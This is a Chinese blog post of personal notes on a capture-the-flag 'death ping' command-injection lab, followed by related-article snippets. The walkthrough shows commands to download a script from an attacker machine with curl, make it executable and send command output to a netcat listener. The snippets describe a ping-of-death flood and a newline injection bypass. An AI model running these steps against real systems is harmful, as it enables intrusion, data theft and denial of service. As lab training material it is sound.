死亡ping命令

最新推荐文章于 2023-11-26 14:48:46 发布
最新推荐文章于 2023-11-26 14:48:46 发布
阅读量308 收藏
点赞数 7
分类专栏: 漏洞复现 文章标签: 笔记 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79118231/article/details/134081645
版权

注:个人笔记,并不详细,仅供参考。

漏洞环境

VULFOCUS中复现该漏洞

  1. 启动镜像并访问80端口的映射端口

在这里插入图片描述
在这里插入图片描述

  1. 打开bp ,在输入框输入127.0.0.1 ,进行抓包,然后发送到中继器

在这里插入图片描述

  1. 可以使用执行curl命令下载sh脚本到服务器,再执行的方式,将结果nc到kali回显执行的命令。
  2. 在kali 中新建111.sh脚本,内容为:ls /tmp | 10.9.47.209 8890

在这里插入图片描述

  1. 在kali桌面打开终端,开启http服务
python3 -m http.server 80

在这里插入图片描述

  1. 在服务器bp 中进行远程下载
curl 10.9.47.209/111.sh > /tmp/111.sh

在这里插入图片描述

在这里插入图片描述

上传成功
在这里插入图片描述

  1. 给上传的脚本进行赋权
chmod 777 /tmp/111.sh

在这里插入图片描述

  1. 在kali开启监听,并执行该脚本

开启监听:

nc -lnvp 8890

在这里插入图片描述

执行脚本:

在这里插入图片描述

  1. 获得flag

在这里插入图片描述

ZS_zsx
关注
  • 7
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
python实现ping的方法
09-21
为了实现ping命令的功能,你需要创建一个socket,设置好超时时间,然后调用`send_one_ping()`发送ping请求,并使用`receive_one_ping()`接收响应。如果在超时时间内没有收到响应,就认为目标主机不可达。 下面是一...
命令提示符死亡ping教程
c_____Minecraft的博客
06-26 6073
死亡ping是一种DOS攻击手段,这种攻击是属于“拒绝服务”,教程如下: 摁下win+r启动“运行”,然后在“运行”中输入“cmd”启动“命令提示符”, 然后在“命令提示符中输入“ping -l 65500 (目标IP) -t”然后摁下回车键就完成了。 许多网站来把单次字节输入尽量调低,以防御死亡ping的攻击。 ...
死亡Ping
AIwenIPgeolocation的博客
04-12 1817
死亡Ping 攻击是一种 拒绝服务 (DoS) 攻击,攻击者旨在通过发送大于最大允许大小的数据包来破坏目标计算机,从而导致目标计算机冻结或崩溃。原始的死亡Ping 攻击如今并不常见。称为 ICMP 洪水攻击的相关攻击更为普遍。 死亡Ping 如何工作? Internet 控制消息协议 (ICMP) 回显回复消息或 “ping” 是用于测试网络连接的网络实用程序,其工作原理类似于声纳 – 发出“脉冲” 而该脉冲发出的“回显”告知操作员有关环境的信息。如果连接正常,则源计算机收到来自目标计.
社会工程学之黑客七宗罪——贪婪(死亡PING
m0_46347405的博客
04-20 5215
社会工程学之黑客七宗罪——贪婪篇 我将“死亡PING”归结为《贪婪》的治理法则
死亡Ping(英文:ping of death, POD)是一種向目标电脑发送错误封包的或恶意的ping指令的攻击方式
weixin_40191861的博客
08-22 463
POD)是一種向目标电脑发送错误封包的或恶意的指令的攻击方式。通常,一次ping大小為32字节(若考慮標頭则為84字节)。早期的大部分無法處理大於最大封包大小(65,535字节)的ping封包。因此发送这样大小的ping可以令目标电脑崩溃。在早期的实现中,這攻擊方式很容易实现,能影响到众多系统,如等。这是一种专门针对一种弱点的非常简单的攻击。在1997-1998年後几乎所有的现代系統都已經修正了這問題。一般而言,在规范中,ICMP回送消息在数据包的数据部分只有65,536个字节。
反弹shell
chenkaifang的博客
07-14 235
参考链接: https://xz.aliyun.com/t/2549 1、介绍 reverse shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接...
命令执行漏洞--死亡ping
m0_62202418的博客
11-26 508
添加编码类型为Encode下的URL-encode key characters。利用Python中的string模块,输出键盘上所有能打印的字符。然后将字符添加到character set中,用来替换变量。通过curl命令将脚本下载到服务器中的 /tmp目录下。chmod +x /tmp/re.sh进行URL编码。能够curl成功,说明%0a后面的命令执行成功。curl一下kali的IP,进行URL编码。sh /tmp/re.sh进行URL编码。%0a代表换行回车,也可以用来连接命令
DOS命令大全
03-12
10. **Ping**: 用于测试网络连通性,`ping ip(或域名)`发送默认大小的数据包,`ping -t -l 65550 ip`是死亡ping,可能导致目标机器瘫痪。 11. **Ipconfig**: 显示网络适配器的配置信息,`ipconfig /all`显示详细...
DOS命令大全.docx
08-07
- `ping`的`-t`持续发送数据,`-l`指定数据包大小,死亡ping(`ping -t -l 65550`)则可能对目标造成影响。 了解这些DOS命令有助于提升在Windows环境下的系统管理和问题解决能力。它们不仅适用于旧版Windows,也...
CMD命令大全
08-24
8. **`ping`**:测试网络连接,`ping ip` 发送默认的32字节数据,`ping -t -l 65550 ip` 用来执行死亡ping。 9. **`ipconfig`** 或 **`winipcfg`**:查看本地IP配置信息,`ipconfig /all` 显示所有详细信息。 10...
死亡ping
10-23
默认的情况下windows的ping发送的数据包大小为32byt,我们也可以自己定义它的大小,但有一个大小的限制,就是最大只能发送65500byt
死亡Ping.zip
10-24
本工具仅用于 技术研究 请勿用来做非法用途
深入理解死亡Ping ---《openstack 网络安全》
不积跬步,无以至千里;不积小流,无以成江海。
05-31 1298
ping命令通常用来作为网络可用性的检查。ping命令可以对一个网络地址发送测试数据包,看该网络地址是否有响应并统计响应时间,以此测试网络。
BUUCTF--[第二章 web进阶]死亡ping命令
qq_45414878的博客
11-13 7034
BUUCTF–[第二章 web进阶]死亡ping命令 开启环境发现是一个ping的页面,并且过滤了许多字符 fuzz测试如下
CTF之命令执行常见绕过
qq_42383069的博客
04-18 5123
在 linux 下表示分隔符,只有cat$IFSa.txt 的时候, bash 解释器会把整个 IFSa当做变量名,所以导致没有办法运行,然而如果加一个 {} 就固定了变量名,同理在后面加个 $ 可以起到截断的作用,而 $9 指的是当前系统shell 进程的第九个参数的持有者,就是一个空字符串,因此 $9 相当于没有加东西,等于做了一个前后隔离。]有一个重要的区别,当匹配的文件不存在,[…通过测试,可见程序过滤了截断符,根据以上的知识,我们来fuzz一下可用的截断符。根据burp爆破,发现可以通过。
从0到1:CTFer成长之路——死亡 Ping 命令
weixin_51559599的博客
10-26 312
手动尝试慢脚本生成可打印字符,后面拼接命令bp 爆破出现中文乱码设置编码爆破最终发现转义后的%0A拼接时未被过滤。
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]死亡ping命令
weixin_46703850的博客
02-26 3317
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]死亡ping命令
[实验室每日一题][20201123][Web]死亡ping命令
m0_50317371的博客
12-02 3716
原题目:BUUCTF–[第二章 web进阶]死亡ping命令 前置基础(本题会用到的相关命令) liunx命令 ls命令 Linux ls(英文全拼:list files):命令用于显示指定工作目录下之内容(列出目前工作目录所含之文件及子目录)。 转自:菜鸟教程 cat命令 cat(英文全拼:concatenate):命令用于连接文件并打印到标准输出设备上。 转自:菜鸟教程 curl命令 curl(英文全拼:CommandLine Uniform Resource Locator):curl 是常用的命令
ping命令 icmp
最新发布
04-27
ping命令是一种网络诊断工具,用于测试主机之间的连通性。它使用ICMP(Internet Control Message Protocol)来发送网络探测包,并接收目标主机的响应。通过发送ICMP回显请求(Echo Request)消息,ping命令可以确定目标主机是否可达以及网络延迟。 ping命令的基本语法是在命令行中输入"ping"后跟上目标主机的IP地址或域名。执行ping命令后,系统会发送一系列的ICMP回显请求消息到目标主机,并等待目标主机的响应。如果目标主机可达,它会发送ICMP回显应答(Echo Reply)消息作为响应。ping命令会显示每个回显请求的往返时间(Round-Trip Time,RTT),以及丢包率等信息。 通过使用ping命令,可以进行以下操作: 1. 测试网络连通性:通过向目标主机发送ICMP回显请求,可以确定目标主机是否可达。 2. 测试网络延迟:通过测量往返时间(RTT),可以评估网络的延迟情况。 3. 检测网络丢包:通过检查丢包率,可以确定网络是否存在丢包问题。 4. 确定网络故障位置:通过在不同的网络节点上执行ping命令,可以确定网络故障出现在哪个节点上。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值